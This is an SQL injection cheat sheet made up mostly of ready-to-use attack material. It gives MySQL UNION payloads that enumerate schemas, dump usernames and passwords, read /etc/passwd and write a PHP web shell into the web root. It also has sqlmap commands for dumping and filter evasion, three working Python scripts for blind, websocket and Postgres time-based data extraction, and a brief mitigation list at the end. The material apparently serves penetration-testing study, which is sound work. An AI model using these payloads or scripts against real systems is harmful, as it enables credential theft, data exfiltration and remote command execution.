Terminators
;# (MySQL)
;-- - (MySQL)
;-- (Postgres)
/* (Postgres)
Basic Injection Examples
Detect number of columns using order by
Detect number of columns using Union injection
' UNION select 1,2,3;-- -
Get database version
' UNION select 1,@@version,3,4;-- -
Get current database name
' UNION select 1,database(),2,3;-- -
Database Enumeration
List all databases
' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA;-- -
List all tables in a specific database
' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev';-- -
List all columns in a specific table
' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials';-- -
Dump data from a table in another database
' UNION select 1, username, password, 4 from dev.credentials;-- -
Concat data together into 1 column
' UNION select 1, group_concat(username, password), 3, 4 from dev.credentials;-- -
File Injection
Read local file
' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4;-- -
Write a string to a local file
' UNION select 'file written successfully!' into outfile '/var/www/html/proof.txt';-- -
Write a web shell into the base web directory
' UNION select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php';-- -
Get Privileges
Find current user
' UNION SELECT 1, user(), 3, 4;-- -
Find if user has admin privileges
' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root";-- -
Find all privileges of a user
' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root";-- -
Find which directories can be accessed through MySQL
' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv";-- -
SQLMap
Generic SQLmap POST Request
$ sqlmap 'http://www.example.com/' --data 'uid=1&name=test'
POST request specifying injection point with asterisks
$ sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
Copy the HTTP request (POST or GET) to req.txt and pass it to SQLMap with -r (e.g. $ sqlmap -r req.txt)
Specifying other methods
$ sqlmap -u www.target.com --data='id=1' --method <METHOD>
Specifying a Prefix or Suffix to the injection
$ sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
Changing Risk and Level parameters for more aggressive testing
$ sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3
Changes the SQL queries to use different syntaxes to bypass filters
$ sqlmap -u www.example.com/?id=1 -v 3 --tamper=between
Basic database enumeration and dumping
$ sqlmap -u "http://www.example.com/?id=1" --dbs
$ sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
$ sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
Passing CSRF token value
$ sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
If characters come back garbled during blind SQL injection, use --hex
$ sqlmap -u "http://www.example.com/" --dbs --hex
Sample Scripts
Multi-threaded Blind SQL injection
import requests
import threading
import time
# Base URL; the injected payload is appended directly after "q=".
url = "http://url?q="
# Inclusive bounds of the binary search that getLength runs for the result length.
MIN = 0
MAX = 1024
# Number of threads blindCompare starts and joins together as one batch.
CHUNK_SIZE = 100
# Substring whose presence in the response body marks a true condition.
SUCCESS_STR = "Suggestions"
def BlindarySearch(low, high, sql):
    """Binary-search the integer value of a SQL expression via a boolean oracle.

    Each step sends up to two requests: one testing ``sql = mid`` and, when
    that is false, one testing ``sql < mid`` to pick the half to keep. A
    condition counts as true when SUCCESS_STR appears in the response body.

    Args:
        low: Smallest candidate value (inclusive).
        high: Largest candidate value (inclusive).
        sql: SQL expression that evaluates to an integer.

    Returns:
        The value in ``[low, high]`` for which the equality test succeeded.

    Raises:
        ValueError: If the range is exhausted without any equality test
            succeeding (the value lies outside the range, or the oracle
            never reported success).
    """
    # Iterating on a shrinking range guarantees termination; the recursive
    # form had no base case and ran until RecursionError on a miss.
    while low <= high:
        mid = (high + low) // 2
        inj = f"a')/**/or/**/{sql}={mid}%23"
        q = url + inj
        print(q)
        r = requests.get(q)
        if SUCCESS_STR in r.text:
            return mid
        inj = f"a')/**/or/**/{sql}<{mid}%23"
        q = url + inj
        r = requests.get(q)
        if SUCCESS_STR in r.text:
            high = mid - 1
        else:
            low = mid + 1
    raise ValueError(f"no value in the searched range satisfied: {sql}")
def getLength(sql):
    """Return the length of the result of ``sql``.

    Wraps the query in ``length((...))`` and binary-searches the value
    between MIN and MAX with BlindarySearch.

    Args:
        sql: Query whose result length is wanted.

    Returns:
        The length reported by BlindarySearch.
    """
    print("Finding Length...")
    length_sql = f"length(({sql}))"
    ans_len = BlindarySearch(MIN, MAX, length_sql)
    print(f"Length: {ans_len}")
    return ans_len
def chunker(seq, size):
    """Return a generator over consecutive slices of ``seq`` of length ``size``.

    The last slice is shorter when ``len(seq)`` is not a multiple of ``size``.
    """
    # Built eagerly so an invalid step (size == 0) still fails at call time.
    offsets = range(0, len(seq), size)

    def _slices():
        for start in offsets:
            yield seq[start:start + size]

    return _slices()
def blindCompare(sql, ans_len):
    """Recover every character of the result of ``sql`` using worker threads.

    One thread per character position (1..ans_len) runs getChar. Threads are
    started and joined in batches of CHUNK_SIZE.

    Args:
        sql: Query whose result is being extracted.
        ans_len: Number of characters in the result.
    """
    print(f"Extracting result for \"{sql}\"")
    workers = [
        threading.Thread(target=getChar, args=(index, sql))
        for index in range(1, ans_len + 1)
    ]
    print(f"Spawning {ans_len} threads")
    for batch in chunker(workers, CHUNK_SIZE):
        # Launch the whole batch before waiting on any of it.
        for worker in batch:
            worker.start()
        # Block until every thread of the batch has finished.
        for worker in batch:
            worker.join()
def getChar(pos, sql):
    """Recover the character at 1-based position ``pos`` of the result of ``sql``.

    The ASCII code is binary-searched between 32 and 127 and the resulting
    character is stored in the module-level ``answer`` list at index
    ``pos - 1``.
    """
    global answer
    code_point = BlindarySearch(32, 127, f"ascii(substr(({sql}),{pos},1))")
    answer[pos - 1] = chr(code_point)
    print(f"Done {pos}")
if __name__=='__main__':
    # Script entry point: recover the result of `sql` and report elapsed time.
    t0 = time.time()
    # Alternative query: "select @@version"
    sql = "select current_user()"
    # Spaces are replaced with inline comments before the query is embedded.
    sql_nowhites = sql.replace(" ", "/**/")
    ans_len = getLength(sql_nowhites)
    # One slot per character, filled in by the getChar worker threads. A "?"
    # placeholder keeps the join below working when a worker dies before
    # storing its character (an int placeholder made join raise TypeError).
    answer = ["?"] * ans_len
    blindCompare(sql_nowhites, ans_len)
    print(''.join(answer))
    print("done!")
    t1 = time.time()
    total = t1-t0
    print(f"Total time took: {total}s")
Single-Threaded Blind SQL injection. You would usually use this for asynchronous interactions, such as websockets
import time
import socketio
# Socket.IO client used by the event handlers and by Emittor.
sio = socketio.Client()
@sio.event
def message(data):
    """Print the payload of every ``message`` event received."""
    print(data)
@sio.event
def emailFound(data):
    """Store the payload of an ``emailFound`` event in ``reply`` and print it.

    BlindarySearch compares ``reply`` with SUCCESS_STR to read the outcome of
    the query it just sent.
    """
    global reply
    reply = data
    print(data)
# Connect as soon as the script is loaded; Emittor emits on this connection.
sio.connect('http://url/socket.io/')
# Inclusive bounds of the binary search that getLength runs for the result length.
MIN = 0
MAX = 500
# Value of `reply` that marks a true condition.
SUCCESS_STR = True
# Last payload received by the emailFound handler.
reply = False
def Emittor(inj):
    """Send one injected value in a ``checkEmail`` event and wait for the answer.

    Args:
        inj: String sent as the ``email`` field.

    The function returns nothing; the outcome is read from the module-level
    ``reply``, which the emailFound handler sets when a response arrives.
    """
    global reply
    # Clear the previous answer first: if no emailFound event arrives within
    # the wait below, the caller must not read the prior query's result.
    reply = False
    print(f"querying {inj}")
    sio.emit("checkEmail",{"email":inj,"token":"eUFeekMC4dTqKgppw5HjFPQZ1t7JuuMN"})
    # Fixed wait that gives the response event time to arrive.
    time.sleep(0.5)
def BlindarySearch(low, high, sql):
    """Binary-search the integer value of a SQL expression via a boolean oracle.

    Each step emits up to two queries through Emittor: one testing
    ``sql = mid`` and, when that is false, one testing ``sql < mid`` to pick
    the half to keep. A condition counts as true when ``reply`` equals
    SUCCESS_STR after Emittor returns.

    Args:
        low: Smallest candidate value (inclusive).
        high: Largest candidate value (inclusive).
        sql: SQL expression that evaluates to an integer.

    Returns:
        The value in ``[low, high]`` for which the equality test succeeded.

    Raises:
        ValueError: If the range is exhausted without any equality test
            succeeding (the value lies outside the range, or no positive
            reply was ever received).
    """
    # Iterating on a shrinking range guarantees termination; the recursive
    # form had no base case and ran until RecursionError on a miss.
    while low <= high:
        mid = (high + low) // 2
        inj = f"bb@gmail.com' or {sql}={mid};-- - "
        Emittor(inj)
        if SUCCESS_STR == reply:
            return mid
        inj = f"bb@gmail.com' or {sql}<{mid};-- - "
        Emittor(inj)
        if SUCCESS_STR == reply:
            high = mid - 1
        else:
            low = mid + 1
    raise ValueError(f"no value in the searched range satisfied: {sql}")
def getLength(sql):
    """Return the length of the result of ``sql``.

    Wraps the query in ``length((...))`` and binary-searches the value
    between MIN and MAX with BlindarySearch.

    Args:
        sql: Query whose result length is wanted.

    Returns:
        The length reported by BlindarySearch.
    """
    print("Finding Length...")
    length_sql = f"length(({sql}))"
    ans_len = BlindarySearch(MIN, MAX, length_sql)
    print(f"Length: {ans_len}")
    return ans_len
def blindCompare(sql, ans_len):
    """Recover the result of ``sql`` one character at a time and print it.

    Positions 1..ans_len are resolved in order with getChar; the assembled
    string is printed once all positions are done.
    """
    print(f"Extracting result for \"{sql}\"")
    recovered = "".join(getChar(index, sql) for index in range(1, ans_len + 1))
    print(recovered)
def getChar(pos, sql):
    """Return the character at 1-based position ``pos`` of the result of ``sql``.

    The ASCII code is binary-searched between 32 and 127 with BlindarySearch.
    """
    code_point = BlindarySearch(32, 127, f"ascii(substr(({sql}),{pos},1))")
    return chr(code_point)
if __name__=='__main__':
    # Script entry point: find the result length, extract it, report timing.
    started = time.time()
    sql = "SELECT group_concat(column_name) as f FROM INFORMATION_SCHEMA.COLUMNS where table_name='Users'"
    blindCompare(sql, getLength(sql))
    print("done!")
    total = time.time() - started
    print(f"Total time took: {total}s")
Sleep Injection with Postgres
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Seconds passed to pg_sleep on a correct guess; time_query also uses it as the delay threshold.
SLEEP = 5
# Base URL; the converted payload is appended directly after the trailing ";".
url = "https://url?userId=1;"
# Query whose result is extracted one character at a time.
payload = "SELECT version()"
# Payload template; ^_POS_^, ^_ASCII_^ and ^_SLEEP_^ are placeholders filled in by iterator_query.
inj = "SELECT CASE WHEN(ASCII(SUBSTR(("+payload+"),^_POS_^,1))=^_ASCII_^) THEN pg_sleep(^_SLEEP_^) END;"
def convert(inj):
    """Encode a payload for the URL and append the trailing comment.

    Spaces become ``+``, single quotes become ``$$``, and ``--+`` is added
    at the end.
    """
    encoded = inj.replace(" ", "+").replace("'", "$$")
    return f"{encoded}--+"
def time_query(url, conv_inj_replaced):
    """Report whether the injected request was delayed by at least SLEEP seconds.

    Sends the plain URL first as a timing baseline, then the URL with the
    payload appended, and compares the two elapsed times.

    Args:
        url: Base URL of the request.
        conv_inj_replaced: Fully substituted payload appended to ``url``.

    Returns:
        True when the rounded difference between the two elapsed times is
        at least SLEEP, otherwise False.
    """
    # Baseline: response time without any payload.
    print("Doing base query")
    baseline = requests.get(url, verify=False).elapsed.total_seconds()
    # Same request with the payload appended.
    print("Doing delayed query")
    injected = requests.get(url + conv_inj_replaced, verify=False).elapsed.total_seconds()
    return round(injected - baseline) >= SLEEP
def iterator_query(url, conv_inj):
    """Extract the query result character by character using response delays.

    For each position, every candidate ASCII code is substituted into the
    payload template and timed with time_query; the first candidate that
    triggers the delay is taken as the character at that position.

    Args:
        url: Base URL of the request.
        conv_inj: Converted payload template containing the ^_POS_^,
            ^_ASCII_^ and ^_SLEEP_^ placeholders.

    Returns:
        The characters recovered so far. Extraction stops at the first
        position where no candidate matches, or after 99 characters.
    """
    answer = ""
    # The sleep duration is the same for every probe, so substitute it once.
    with_sleep = conv_inj.replace('^_SLEEP_^', str(SLEEP))
    # At most 99 characters of output are extracted.
    for pos in range(1, 100):
        # The position is constant across all candidates of the inner loop.
        at_pos = with_sleep.replace('^_POS_^', str(pos))
        # Printable ASCII 32..126. Space (32) is included so that spaces in
        # the result are not silently skipped.
        for char in range(32, 127):
            conv_inj_replaced = at_pos.replace('^_ASCII_^', str(char))
            print(conv_inj_replaced)
            if time_query(url, conv_inj_replaced):
                print("found!")
                answer += chr(char)
                print(answer)
                break
        else:
            # No candidate matched: treat this as the end of the result
            # rather than probing every remaining position.
            break
    return answer
if __name__=='__main__':
    # Script entry point: encode the payload template, then run the extraction.
    iterator_query(url, convert(inj))
Mitigation
Input Sanitization on Front-end, Back-end
Input Validation on Front-end, Back-end
Proper MySQL user Privileges
Don't grant privileges on all tables
WAF to detect and block attacks
Parameterized SQL Queries to prevent user input injection